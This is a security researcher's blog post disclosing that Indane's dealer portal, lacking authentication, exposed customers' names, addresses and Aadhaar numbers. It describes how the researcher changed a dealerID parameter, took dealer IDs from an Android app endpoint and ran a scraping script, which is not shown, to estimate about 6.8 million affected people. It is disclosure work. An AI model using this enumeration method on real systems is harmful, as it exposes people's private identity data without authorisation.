Indane leaked Aadhaar numbers: 6,700,000 Aadhaar numbers

image

On February 10, I received a very interesting private message on Twitter.

image

There is “Aadhaar” and “leak” in the same sentence, this guy managed to get my interest. After a few messages, he sent me a url.

image

This page contains a lot of juicy information:

  • The hyperlink associated to the “Consumer No” contains a parameter called “aadhar_no”
  • The “Consumer Name”
  • The “Consumer Address”
  • On the bottom right we have the “Total Records”
  • In the url, there is a parameter called dealerID

So due to a lack of authentication in the local dealers portal, Indane is leaking the names, addresses and the Aadhaar numbers of their customers. But how big is this leak?

This is the dealer portal, so if we modify the value of the dealerID parameter, we can access the consumer infos of another dealer. So, to get the size of this leak we need to get the ids of the Indane dealers.

image

According to Wikipedia, Indane serves more than 90 million famillies through a network of 9100 distributors. Wow, we have a story here, I definitely need to investigate more.

Oh, they have an Android app, it can be interesting to look at it too.

image

image

image

In their app, there is the possibility to “Locate Your Distributor”. What is happening under the hood?

image

image

Bingo! When I use the “Locate Your Distributor” feature, the server send the dealer ids of the corresponding “bgadistrict”. With the dichotomy method I easily found that there is 714 bgadistrict.

Great, time to code! We have everything we need to get the size of this leak. Thanks to the endpoint found in the Android app, we will obtain all the valid dealer ids and then we will scrape all the “Total records” in the local dealer portal.

image

image

After a few minutes, I wrote this python script. By running this script, it gives us 11062 valid dealer ids. After more than 1 day, my script tested 9490 dealers and found that a total of 5,826,116 Indane customers are affected by this leak.

Unfortunately, Indane probably blocked my IP, so I didn’t test the remaining 1572 dealers. By doing some basic math we can estimate the final number of affected customers around 6,791,200.

Summary

  • Due to a lack of authentication in the local dealers portal, Indane is leaking the names, addresses and the Aadhaar numbers of their customers
  • Indane has 11062 dealers
  • Total number of affected customer is around 6,791,200

Timeline

02/10/19: Anonymous tip from a Twitter follower
02/15/19: Disclosure to Indane
02/19/19: Indane didn’t answer. Public disclosure

Coverage